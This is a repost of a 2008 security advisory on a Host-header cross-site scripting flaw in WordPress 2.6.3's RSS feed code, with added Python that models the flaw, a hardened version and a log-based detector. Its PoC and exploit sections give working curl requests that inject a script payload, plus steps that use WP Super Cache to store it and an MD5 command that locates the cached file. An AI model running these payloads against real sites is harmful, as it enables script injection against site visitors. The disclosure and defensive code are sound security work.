WordPress <= 2.6.3 XSS Vulnerability

Due to what we consider a critical, exploitable vulnerability in the RSS subsystem in WordPress 2.6.3 and below, WordPress has released a fix and moved to version 2.6.5. The links to the new version and other information are available after the jump, along with the Full Disclosure vulnerability announcement from Jeremias Reith.

===== noXSS.org Security Advisory =====
Advisory: WordPress XSS vulnerability in RSS Feed Generator
Author: Jeremias Reith <redacted>
Published: 2008/11/25
Affected: WordPress < 2.6.5
Summary
=======

WordPress prior to v2.6.5 fails to sanitize the Host header variable correctly when generating RSS feeds and is therefore prone to XSS attacks.

Web sites running in a name-based virtual hosting setup are not affected as long as they are not the default virtual host.

Moreover we only found installations running on the Apache web server to be affected.

Vulnerability Details
=====================

The function self_link() in wp-includes/feed.php is used to generate absolute URLs for the <atom:link> tag in ATOM and RSS 2.0 feeds:

function self_link() {
    echo 'http'
        . ( $_SERVER['https'] == 'on' ? 's' : '' ) . '://'
        . $_SERVER['HTTP_HOST']
        . wp_specialchars(stripslashes($_SERVER['REQUEST_URI']), 1);
}

The function does not sanitize the HTTP_HOST variable in any way, but WordPress replaces all $_SERVER variables with escaped ones in wp-settings.php:

$_SERVER = add_magic_quotes($_SERVER);

In almost all setups add_magic_quotes() runs mysql_real_escape_string() over the elements and returns the modified array. Unfortunately this escaping method is not safe in markup context.

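
The following Python model is an added example, not part of the noXSS.org advisory and not WordPress code. It mimics the addslashes()-style escaping that add_magic_quotes() applied to $_SERVER (mysql_real_escape_string() additionally escapes a few control characters, but likewise never touches '<' or '>'), shows why that leaves the <atom:link href="..."> attribute injectable, and places a hardened variant beside it that accepts the Host header only if it is a well-formed hostname on an allowlist of configured hosts and HTML-escapes it for the attribute context. The allowlist, the fallback host and the sample header values are assumptions constructed for the example; WordPress's actual 2.6.5 patch is not reproduced here.

```python
import html
import re

# Constructed sample Host header values (not taken from live traffic).
LEGIT_HOST = "www.example.org"
MARKUP_HOST = '"> <body onload=alert(String.fromCharCode(88,83,83))>'

# Hostname grammar: DNS labels joined by dots, optional :port, at most 253
# characters. Quotes, spaces and angle brackets are rejected outright.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*"
    r"(?::\d{1,5})?$",
    re.IGNORECASE,
)


def addslashes(value: str) -> str:
    """Mimic PHP addslashes(): backslash-escape ' " \\ and NUL. This is the
    escaping WordPress's add_magic_quotes() applied to $_SERVER. It exists for
    SQL string literals and never touches '<' or '>'."""
    return re.sub(r"(['\"\\\x00])", r"\\\1", value)


def self_link_vulnerable(server: dict) -> str:
    """Model of self_link() before 2.6.5: HTTP_HOST passes through
    addslashes() only; REQUEST_URI is HTML-escaped as wp_specialchars() did."""
    scheme = "https" if server.get("https") == "on" else "http"
    host = addslashes(server["HTTP_HOST"])
    uri = html.escape(server["REQUEST_URI"], quote=True)
    return (f'<atom:link href="{scheme}://{host}{uri}" '
            f'rel="self" type="application/rss+xml" />')


def is_valid_host(host: str) -> bool:
    """True only for a syntactically valid hostname with optional port."""
    return bool(HOSTNAME_RE.match(host))


def self_link_hardened(server: dict, allowed_hosts: set, fallback_host: str) -> str:
    """Hardened variant (assumed design, not WordPress's actual patch): the Host
    header is used only if it is well-formed AND one of the hosts the site is
    configured to serve (allowlist entries are lowercase); otherwise the
    configured fallback is used. Output is escaped for the attribute context."""
    scheme = "https" if server.get("https") == "on" else "http"
    raw_host = server.get("HTTP_HOST", "")
    if is_valid_host(raw_host) and raw_host.lower() in allowed_hosts:
        host = raw_host
    else:
        host = fallback_host
    uri = html.escape(server.get("REQUEST_URI", "/"), quote=True)
    # Escaping a validated hostname is a no-op, but keeping it makes the
    # output safe even if the allowlist check is later relaxed.
    return (f'<atom:link href="{scheme}://{html.escape(host, quote=True)}{uri}" '
            f'rel="self" type="application/rss+xml" />')


def compare(host: str, uri: str = "/blog/feed") -> dict:
    """Run both variants on one Host header and report whether raw markup
    survived into the generated <atom:link> element."""
    server = {"HTTP_HOST": host, "REQUEST_URI": uri}
    vuln = self_link_vulnerable(server)
    hard = self_link_hardened(server, {LEGIT_HOST}, LEGIT_HOST)
    return {
        "vulnerable": vuln,
        "hardened": hard,
        "vulnerable_has_markup": "<body" in vuln,
        "hardened_has_markup": "<body" in hard,
    }


if __name__ == "__main__":
    for name, value in compare(MARKUP_HOST).items():
        print(f"{name}: {value}")
```

Running the model on the markup-bearing header shows the point of the advisory: the escaped quote comes out as `\"`, which is harmless to SQL but closes nothing in HTML, so the attribute is still terminated by the following `>` and the injected element survives. The hardened variant falls back to the configured host because the header fails the grammar check before the allowlist is even consulted.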
PoC
====

The Apache web server only disallows '/', '\' and '..' within the Host header. The header can therefore contain markup, making the following PoC possible:

curl -H "Host: \"> <body onload=alert(String.fromCharCode(88,83,83))>" \
http://www.example.org/blog/feed

The given example request will return (without additional newlines):

-- snip --

<atom:link href="http://\"> <body onload=alert(String.fromCharCode(88,83,83))>/blog/feed" rel="self" type="application/rss+xml" />

-- snip --

The embedded JavaScript will be executed in Firefox 3.0.4 due to the triggered switch to Quirks mode.
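
As an added detection example (not part of the advisory), the following Python scans Apache access log lines for Host header values that are not well-formed hostnames, which is how a request like the PoC above would appear on the server side. It assumes a custom LogFormat that appends %{Host}i as a final quoted field (Apache's stock 'combined' format does not record the Host header); the log lines, IP addresses and byte counts are constructed for the example.

```python
import re

# Constructed sample log lines in the assumed format
#   LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Host}i\"" hostlog
# Apache escapes '"' inside a logged header value as '\"', so the PoC Host
# header appears escaped on line 2. Line 4 logs '-' (no Host header sent).
SAMPLE_LOG = r'''
203.0.113.7 - - [25/Nov/2008:10:00:01 +0100] "GET /blog/feed HTTP/1.1" 200 4113 "www.example.org"
203.0.113.7 - - [25/Nov/2008:10:00:02 +0100] "GET /blog/feed HTTP/1.1" 200 4159 "\"> <body onload=alert(String.fromCharCode(88,83,83))>"
198.51.100.2 - - [25/Nov/2008:10:00:03 +0100] "GET /blog/ HTTP/1.1" 200 9212 "www.example.org:8080"
198.51.100.2 - - [25/Nov/2008:10:00:04 +0100] "GET /blog/feed HTTP/1.0" 200 4113 "-"
'''.strip("\n")

# A quoted log field: a run of non-quote, non-backslash characters or escapes.
QUOTED = r'(?:[^"\\]|\\.)*'
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>' + QUOTED + r')" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<host>' + QUOTED + r')"$'
)

# Hostname grammar: DNS labels joined by dots, optional :port.
HOSTNAME_RE = re.compile(
    r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*(?::\d{1,5})?$",
    re.IGNORECASE,
)


def unescape_apache(field: str) -> str:
    """Undo Apache's \\" and \\\\ escaping in a logged field. (Apache also
    writes non-printable bytes as \\xHH; that form is not decoded here.)"""
    return re.sub(r'\\(.)', r'\1', field)


def parse_line(line: str):
    """Parse one line into a dict of named fields, or None if it does not
    match the assumed log format."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["host"] = unescape_apache(rec["host"])
    return rec


def find_suspicious_hosts(log_text: str) -> list:
    """Return (line_no, client, host) for every request whose Host header was
    present but is not a syntactically valid hostname[:port]."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        rec = parse_line(line)
        if rec is None or rec["host"] == "-":
            continue  # unparseable line, or request sent without a Host header
        if not HOSTNAME_RE.match(rec["host"]):
            hits.append((line_no, rec["client"], rec["host"]))
    return hits


if __name__ == "__main__":
    for line_no, client, host in find_suspicious_hosts(SAMPLE_LOG):
        print(f"line {line_no}: {client} sent Host header {host!r}")
```

Only the second line is reported; the host with a port and the request without a Host header pass. Because the check is on grammar rather than on a signature such as `<body`, it also catches payload variants the advisory does not list, at the cost of flagging any client that sends a malformed Host header for benign reasons.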

Exploit
=======

The following exploit is a semi-stored XSS attack and has been tested with the following setup:

- Apache 2.x with IP based virtual hosting
- WordPress 2.6.3 installed in /blog/
- WP Super Cache 0.84
- Firefox 3.0.4

WP Super Cache is a popular WordPress plugin that adds static file caching to WordPress. It greatly increases performance and is often used. It saves generated pages in the wp-content/cache directory and adds mod_rewrite rules to serve cached pages statically.

Issuing a malicious request to a vulnerable WordPress installation will lead to a file containing the XSS being generated and placed within the document root.

Request:

curl -H "Host: \"><body onload=alert(String.fromCharCode(88,83,83))>" \
http://www.example.org/blog/feed

Generated file:

http://example.org/blog/wp-content/cache/wp-cache-#md5sum#.html

Firefox will execute the embedded JavaScript even though the feed is XML because the file is served as text/html.

The only missing step is the calculation of the cached file's MD5 sum.

The following code generates the MD5 checksum:

php -r 'echo md5("\"><body onload=alert(String.fromCharCode(88,83,83))>" . "/blog/feed"), "\n";'

In the default setup the MD5 sum can be generated by concatenating the contents of HTTP_HOST and REQUEST_URI, resulting in 0d2ca4617758433a7864d57493be2c5b for the given example.

This file can be accessed until the cache expiration mechanism removes it. The default expire time is 3600 seconds.

Vendor Response
===============

2008-11-17 Reported to vendor

2008-11-17 Initial response from vendor

2008-11-25 Release of version 2.6.5
